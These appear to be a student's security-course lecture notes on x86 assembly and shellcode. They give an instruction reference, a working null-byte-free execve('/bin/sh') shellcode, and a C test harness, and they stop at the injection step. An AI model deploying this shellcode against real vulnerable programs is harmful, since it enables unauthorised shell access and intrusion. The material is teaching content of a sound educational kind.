Computer and Network Security

Lecture 6: assembly, shellcode exploits

Assembly

We use x86 assembly in AT&T notation (personal note: Intel notation is nicer to use, though).

Low-level, processor-specific symbolic language, directly translated to machine code.

Instructions: simple operations like mov %rax, %rbx (copies the value from register rax to register rbx)

Directives: commands for assembler

Labels: create a symbol at the current address (foo: .byte 42 is similar to a global char foo = 42)

Comments: prefixed with #

Endianness: when storing an integer in memory, which byte is stored first

Signed integers:

Common instructions:

example             meaning
mov src, dst        dst = src
xchg dst1, dst2     swap dst1 and dst2
push src            store src on top of stack
pop dst             remove value from top of stack and store in dst
add src, dst        dst += src
sub src, dst        dst -= src
inc dst             dst += 1
dec dst             dst -= 1
neg dst             dst = -dst
cmp src1, src2      set flags based on src2-src1
and src, dst        dst &= src
or src, dst         dst |= src
xor src, dst        dst ^= src
not dst             dst = ~dst
test src1, src2     set flags based on src1 & src2
jmp addr            jump to addr
call addr           push return address, call function addr
ret                 pop return address, return there
syscall             enter kernel to perform system call (based on registers)
lea src, dst        dst = &src (src must be in memory)
nop                 do nothing

Conditional branching instructions, which act on the flags set by a preceding instruction such as cmp src, dst (insert ‘n’ after the ‘j’ for the opposite condition, e.g. jne)

example             meaning
je addr; jz addr    jump if result == 0
jb addr             jump if dst < src (unsigned)
ja addr             jump if dst > src (unsigned)
jl addr             jump if dst < src (signed)
jg addr             jump if dst > src (signed)
js addr             jump if result < 0 (signed)

Stack:

Shellcode

Assume we:

Where do we point return address?

x86 CPUs don’t distinguish code and data, so if memory permissions allow:

How do we inject code into program?

Injected code must:

User code can’t start program, kernel does that. So tell kernel to do something using a syscall:

Starting a shell:

Shellcode:

.data
.globl shellcode
shellcode:
    jmp code_start
string_addr:
    .ascii "/bin/shNAAAAAAAABBBBBBBB"
code_start:
    leaq string_addr(%rip), %rdi    # load address of the string into %rdi ('path' in execve), offset is negative so it contains no null bytes
    xorl %eax, %eax                 # clear %rax without using null bytes
    movb %al, 0x07(%rdi)            # replace "N" in string with null, use %al to avoid explicit null
    movq %rdi, 0x08(%rdi)           # store address of program name as argv[0] for execve (overwrites the A's)
    movq %rax, 0x10(%rdi)           # store null as argv[1] for execve (overwrites the B's), use %rax to avoid explicit null
    leaq 0x08(%rdi), %rsi           # load address of argv into %rsi
    movq %rax, %rdx                 # load null into %rdx ('envp' in execve), use %rax to avoid explicit null
    movb $0x3b, %al                 # load syscall number into %al, 0x3b is execve, we already xored %eax so the other bytes of %rax are zero
    syscall                         # perform call 0x3b(%rdi, %rsi, %rdx)
    .byte 0

Testing shellcode:

#include <stdio.h>
int main(int argc, char **argv) {
    extern char shellcode;
    void (*f)(void) = (void (*)(void)) &shellcode; // cast pointer to shellcode to function pointer to 'void shellcode(void)'
    f();
    fprintf(stderr, "this shouldn't print\n");
    return -1;
}

Injecting the shellcode: